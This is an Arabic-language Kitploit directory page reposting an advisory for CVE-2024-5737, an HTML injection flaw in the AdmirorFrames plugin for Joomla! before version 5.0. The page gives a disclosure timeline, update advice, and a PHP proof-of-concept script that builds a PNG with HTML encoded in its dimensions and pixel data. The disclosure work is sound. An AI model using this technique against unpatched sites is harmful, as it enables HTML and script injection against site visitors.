Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-5737 — إضافة AdmirorFrames لجوملا! < 5.0 - حقن HTML | Kitploit
أدوات/GitHubGitHub/afine-com/cve-2024-5737
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويبسوء التكوين
GitHubafine-com/cve-2024-5737

CVE-2024-5737

إضافة AdmirorFrames لجوملا! < 5.0 - حقن HTML

عرض المستودع
منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-5737

إضافة AdmirorFrames لـ Joomla! < 5.0 - حقن HTML

الجدول الزمني

  • تم الإبلاغ عن الثغرة للبائع: 26.01.2024
  • تم إصدار الإصدار 5.0 المُصلَح الجديد: 06.06.2024
  • الإفصاح العام: 28.06.2024

الوصف

حقن HTML في إضافة AdmirorFrames لـ Joomla! في ملف afGdStream.php الذي لا يضبط قيمة رأس Content-Type قبل إرسال بيانات الصورة. يؤدي هذا إلى إرسال PHP للقيمة الافتراضية لهذا الرأس (text/html) ويؤدي إلى تفسير بيانات الصورة كمستند HTML.

مثال على سكريبت PHP يُنشئ PNG مع تعيين حقلي العرض والارتفاع إلى وسم HTML <s>:

root@kitploit:~
<?php
$_payload="AAA";
if(strlen($_payload)%3!=0){
 echo "payload%3==0 !\n"; exit();
}
$_pay_len=strlen($_payload);
echo "LEN: $_pay_len\n";
$width=0x733e; //<s>
$height=0x3c;
$im = imagecreate($width, $height);

$_hex=unpack('H*',$_payload);
$_chunks=str_split($_hex[1], 6);

for($i=0; $i < count($_chunks); $i++){

  $_color_chunks=str_split($_chunks[$i], 2);
  $color=imagecolorallocate($im,hexdec($_color_chunks[0]),hexdec($_color_chunks[1]),hexdec($_color_chunks[2]));

  imagesetpixel($im,$i,1,$color);

}

imagepng($im,"example.png");

نتيجة عرض ملف example.png كدليل على المفهوم بواسطة متصفح الويب: proof of concept

حدثت هذه المشكلة بسبب استخدام القيمة الافتراضية لرأس Content-Type. تم إصلاح هذه المشكلة في إضافة AdmirorFrames لـ Joomla! في الإصدار 5.0.

الإصدارات المتأثرة

< 5.0

التوصية

قم بتحديث إضافة AdmirorFrames لـ Joomla! إلى الإصدار 5.0 أو أحدث.

المراجع

  • https://github.com/vasiljevski/admirorframes/issues/3
  • https://cert.pl/en/posts/2024/06/CVE-2024-5735/
  • https://cert.pl/posts/2024/06/CVE-2024-5735/
  • https://nvd.nist.gov/vuln/detail/CVE-2024-5737
تنزيل الأداة